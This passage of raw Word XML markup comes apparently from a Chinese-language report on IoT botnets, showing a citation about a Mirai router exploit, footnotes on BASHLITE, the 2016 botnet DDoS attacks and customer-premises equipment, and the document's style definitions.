                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">BadCyber, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">New Mirai attack vector </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>–</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> bot exploits a recently discovered router vulnerability,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
              <w:pPr>
                <w:divId w:val="2057923878"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w:rsidR="00A6519C" w:rsidRDefault="00A6519C" w:rsidP="009A1AB3">
              <w:pPr>
                <w:ind w:firstLine="422"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00AE2862" w:rsidRDefault="00AE2862">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE2862" w:rsidRDefault="00AE2862">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE2862" w:rsidRPr="00302839" w:rsidRDefault="00AE2862" w:rsidP="00A20197"/>
    <w:sectPr w:rsidR="00AE2862" w:rsidRPr="00302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335" w:rsidRDefault="00D77335" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D77335" w:rsidRDefault="00D77335" w:rsidP="00D566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335" w:rsidRDefault="00D77335" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D77335" w:rsidRDefault="00D77335" w:rsidP="00D56683">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00240703" w:rsidRPr="00240703" w:rsidRDefault="00240703">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BASHLITE</w:t>
      </w:r>
      <w:r>
        <w:t>僵尸主机大都也是物联网设备</w:t>
      </w:r>
      <w:r w:rsidR="000C3AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000C3AAE">
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidR="000C3AAE" w:rsidRPr="000C3AAE">
        <w:t>https://en.wikipedia.org/wiki/BASHLITE</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="006969B5" w:rsidRPr="006969B5" w:rsidRDefault="006969B5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006969B5">
        <w:t>http://arstechnica.com/security/2016/10/double-dip-internet-of-things-botnet-attack-felt-across-the-internet/</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w:rsidR="00D448BD" w:rsidRPr="00D448BD" w:rsidRDefault="00D448BD">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D448BD">
        <w:t>https://www.theguardian.com/technology/2016/nov/03/cyberattack-internet-liberia-ddos-hack-botnet</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="4">
    <w:p w:rsidR="000C123E" w:rsidRPr="002B51AB" w:rsidRDefault="000C123E">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Eir为</w:t>
      </w:r>
      <w:r w:rsidR="00EA1315" w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>爱尔兰最大的ISP提供商</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="5">
    <w:p w:rsidR="00221B73" w:rsidRPr="002B51AB" w:rsidRDefault="00221B73" w:rsidP="00221B73">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPE（英文全称：Customer-premises equipment）用户驻地设备，位于用户端的网络终端设备，用于与电信运营商对接服务。CPE包括：用户自己的服务器，主机，以及LAN设备（路由器，交换机，防火墙等）以及ISP负责安装的WAN设备（CSU/DSUs，调制解调器）。CPE可以将4G信号转换为Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信号</w:t>
      </w:r>
      <w:r w:rsidRPr="002B51AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221B73" w:rsidRDefault="00221B73">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
  </w:footnote>
  <w:footnote w:id="6">
    <w:p w:rsidR="008637CC" w:rsidRDefault="008637CC">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA5558">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用于端口探测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6F23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AAFC1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5A62E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7B80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A51BDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2282E9E"/>
    <w:lvl w:ilvl="0" w:tplc="BD20016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146F80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82AED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470504"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="802EF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076832"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="425AD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610A2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4BE3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DBE540F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="319239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F1014E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F1A797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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="404B2C7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EDAFC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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C1A4CED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B17A0F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6CE5F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="811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04F27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2D2855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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65BC3132"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0622C1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A7B4A04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72E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E34B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C26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B666A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA2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0D2F4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A3E6A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2F2F41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19E84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203183"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63FAC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
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="0"/>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F5"/>
    <w:rsid w:val="00010BA8"/>
    <w:rsid w:val="00013F59"/>
    <w:rsid w:val="000263D9"/>
    <w:rsid w:val="00046FD7"/>
    <w:rsid w:val="0009519D"/>
    <w:rsid w:val="000C123E"/>
    <w:rsid w:val="000C3AAE"/>
    <w:rsid w:val="000E1845"/>
    <w:rsid w:val="000E78DE"/>
    <w:rsid w:val="000E7DAA"/>
    <w:rsid w:val="000F6CCA"/>
    <w:rsid w:val="000F74D9"/>
    <w:rsid w:val="00101332"/>
    <w:rsid w:val="00107DC6"/>
    <w:rsid w:val="00110B80"/>
    <w:rsid w:val="001517ED"/>
    <w:rsid w:val="001727D4"/>
    <w:rsid w:val="00175C9B"/>
    <w:rsid w:val="001914D1"/>
    <w:rsid w:val="00197949"/>
    <w:rsid w:val="001C5E0F"/>
    <w:rsid w:val="00205A54"/>
    <w:rsid w:val="00221B73"/>
    <w:rsid w:val="002373BC"/>
    <w:rsid w:val="00237AE8"/>
    <w:rsid w:val="00240703"/>
    <w:rsid w:val="00241A62"/>
    <w:rsid w:val="00247D45"/>
    <w:rsid w:val="00247FA1"/>
    <w:rsid w:val="00257FC9"/>
    <w:rsid w:val="00270DBE"/>
    <w:rsid w:val="00272683"/>
    <w:rsid w:val="002B33E7"/>
    <w:rsid w:val="002B51AB"/>
    <w:rsid w:val="002D6D7F"/>
    <w:rsid w:val="002E2D9C"/>
    <w:rsid w:val="002E5A41"/>
    <w:rsid w:val="00301030"/>
    <w:rsid w:val="00302839"/>
    <w:rsid w:val="00313101"/>
    <w:rsid w:val="00323EBB"/>
    <w:rsid w:val="003247FF"/>
    <w:rsid w:val="00352BFE"/>
    <w:rsid w:val="003556FB"/>
    <w:rsid w:val="0035585C"/>
    <w:rsid w:val="003714FD"/>
    <w:rsid w:val="00374C28"/>
    <w:rsid w:val="00386B93"/>
    <w:rsid w:val="00397B0D"/>
    <w:rsid w:val="003C3F7B"/>
    <w:rsid w:val="003C6ECE"/>
    <w:rsid w:val="003D31B3"/>
    <w:rsid w:val="003D378D"/>
    <w:rsid w:val="003E254D"/>
    <w:rsid w:val="003E6248"/>
    <w:rsid w:val="004075FC"/>
    <w:rsid w:val="00422134"/>
    <w:rsid w:val="004353F8"/>
    <w:rsid w:val="00450BA2"/>
    <w:rsid w:val="00452B08"/>
    <w:rsid w:val="00453D35"/>
    <w:rsid w:val="00454E3E"/>
    <w:rsid w:val="004554EC"/>
    <w:rsid w:val="00460ADC"/>
    <w:rsid w:val="00466B3F"/>
    <w:rsid w:val="00490F21"/>
    <w:rsid w:val="004A7883"/>
    <w:rsid w:val="004B0670"/>
    <w:rsid w:val="004C0A4C"/>
    <w:rsid w:val="004C0B7D"/>
    <w:rsid w:val="004D30AE"/>
    <w:rsid w:val="004F5BB9"/>
    <w:rsid w:val="004F5E64"/>
    <w:rsid w:val="00511A58"/>
    <w:rsid w:val="005363C5"/>
    <w:rsid w:val="00550128"/>
    <w:rsid w:val="00580485"/>
    <w:rsid w:val="00583BC0"/>
    <w:rsid w:val="005B6355"/>
    <w:rsid w:val="005E3C78"/>
    <w:rsid w:val="005E419F"/>
    <w:rsid w:val="00603332"/>
    <w:rsid w:val="0061449F"/>
    <w:rsid w:val="00652245"/>
    <w:rsid w:val="0065721D"/>
    <w:rsid w:val="00665BFD"/>
    <w:rsid w:val="00667012"/>
    <w:rsid w:val="006828DC"/>
    <w:rsid w:val="006969B5"/>
    <w:rsid w:val="00697F42"/>
    <w:rsid w:val="006B7062"/>
    <w:rsid w:val="006C1B45"/>
    <w:rsid w:val="006D0D5D"/>
    <w:rsid w:val="006F02EB"/>
    <w:rsid w:val="0070776C"/>
    <w:rsid w:val="00733050"/>
    <w:rsid w:val="0075321E"/>
    <w:rsid w:val="00757648"/>
    <w:rsid w:val="00766DAE"/>
    <w:rsid w:val="007A27A4"/>
    <w:rsid w:val="007A5235"/>
    <w:rsid w:val="007B1DCB"/>
    <w:rsid w:val="007B71DE"/>
    <w:rsid w:val="007B7ED4"/>
    <w:rsid w:val="007C0506"/>
    <w:rsid w:val="007C7071"/>
    <w:rsid w:val="007E2F86"/>
    <w:rsid w:val="007E77BB"/>
    <w:rsid w:val="007F2118"/>
    <w:rsid w:val="00827A50"/>
    <w:rsid w:val="00827E22"/>
    <w:rsid w:val="0084304B"/>
    <w:rsid w:val="008575B1"/>
    <w:rsid w:val="008631C3"/>
    <w:rsid w:val="008637CC"/>
    <w:rsid w:val="00863892"/>
    <w:rsid w:val="00863B70"/>
    <w:rsid w:val="008C1061"/>
    <w:rsid w:val="008E4800"/>
    <w:rsid w:val="008F44CC"/>
    <w:rsid w:val="00900F11"/>
    <w:rsid w:val="009235AA"/>
    <w:rsid w:val="009370D9"/>
    <w:rsid w:val="00940F5D"/>
    <w:rsid w:val="009552CA"/>
    <w:rsid w:val="00957F21"/>
    <w:rsid w:val="009A1AB3"/>
    <w:rsid w:val="009D7B07"/>
    <w:rsid w:val="00A20197"/>
    <w:rsid w:val="00A22C57"/>
    <w:rsid w:val="00A23140"/>
    <w:rsid w:val="00A63325"/>
    <w:rsid w:val="00A6519C"/>
    <w:rsid w:val="00A7059C"/>
    <w:rsid w:val="00A7472F"/>
    <w:rsid w:val="00A74D85"/>
    <w:rsid w:val="00A831DB"/>
    <w:rsid w:val="00A9362E"/>
    <w:rsid w:val="00A9371E"/>
    <w:rsid w:val="00AA0FE9"/>
    <w:rsid w:val="00AB2484"/>
    <w:rsid w:val="00AB6FD6"/>
    <w:rsid w:val="00AC028D"/>
    <w:rsid w:val="00AC4DDD"/>
    <w:rsid w:val="00AE2862"/>
    <w:rsid w:val="00AE7B06"/>
    <w:rsid w:val="00B01A51"/>
    <w:rsid w:val="00B32FDA"/>
    <w:rsid w:val="00B34068"/>
    <w:rsid w:val="00B40B90"/>
    <w:rsid w:val="00B437C0"/>
    <w:rsid w:val="00B63CF5"/>
    <w:rsid w:val="00B71D8D"/>
    <w:rsid w:val="00B85BAB"/>
    <w:rsid w:val="00B959E0"/>
    <w:rsid w:val="00BA5558"/>
    <w:rsid w:val="00BB30C8"/>
    <w:rsid w:val="00BE7FAF"/>
    <w:rsid w:val="00C2519C"/>
    <w:rsid w:val="00C311BE"/>
    <w:rsid w:val="00C34ADB"/>
    <w:rsid w:val="00C60072"/>
    <w:rsid w:val="00C6017E"/>
    <w:rsid w:val="00C70BC2"/>
    <w:rsid w:val="00C74294"/>
    <w:rsid w:val="00C8532F"/>
    <w:rsid w:val="00CB04DD"/>
    <w:rsid w:val="00CB7010"/>
    <w:rsid w:val="00CD376A"/>
    <w:rsid w:val="00CE14A0"/>
    <w:rsid w:val="00CE2DE9"/>
    <w:rsid w:val="00CE5D01"/>
    <w:rsid w:val="00CE6432"/>
    <w:rsid w:val="00CF5378"/>
    <w:rsid w:val="00D019B4"/>
    <w:rsid w:val="00D32442"/>
    <w:rsid w:val="00D35AF1"/>
    <w:rsid w:val="00D448BD"/>
    <w:rsid w:val="00D45C48"/>
    <w:rsid w:val="00D55B37"/>
    <w:rsid w:val="00D56683"/>
    <w:rsid w:val="00D56D66"/>
    <w:rsid w:val="00D77335"/>
    <w:rsid w:val="00D94A81"/>
    <w:rsid w:val="00DA0103"/>
    <w:rsid w:val="00DB35D1"/>
    <w:rsid w:val="00DE7744"/>
    <w:rsid w:val="00E25DC8"/>
    <w:rsid w:val="00E520E0"/>
    <w:rsid w:val="00E70CAA"/>
    <w:rsid w:val="00E755C9"/>
    <w:rsid w:val="00E80D5D"/>
    <w:rsid w:val="00E84760"/>
    <w:rsid w:val="00EA1315"/>
    <w:rsid w:val="00EC03BC"/>
    <w:rsid w:val="00EC52D8"/>
    <w:rsid w:val="00ED480A"/>
    <w:rsid w:val="00ED6F99"/>
    <w:rsid w:val="00F07991"/>
    <w:rsid w:val="00F10E83"/>
    <w:rsid w:val="00F1354A"/>
    <w:rsid w:val="00F20691"/>
    <w:rsid w:val="00F47497"/>
    <w:rsid w:val="00F5141B"/>
    <w:rsid w:val="00F568E1"/>
    <w:rsid w:val="00F63267"/>
    <w:rsid w:val="00F63C30"/>
    <w:rsid w:val="00F7293F"/>
    <w:rsid w:val="00F85DDE"/>
    <w:rsid w:val="00F96935"/>
    <w:rsid w:val="00FE0F74"/>
    <w:rsid w:val="00FF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10778-9F71-475F-B8D7-74E64809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F74"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006C1B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F74"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:num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74D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E0F74"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C1B45"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006C1B45"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D56683"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D56683"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D56683"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D56683"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="尾注文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D56683"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D56683"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE2862"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E80D5D"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005363C5"/>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00EA1315"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="004A7883"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007B1DC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d"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="007B1DCB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00697F42"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C601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017E"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
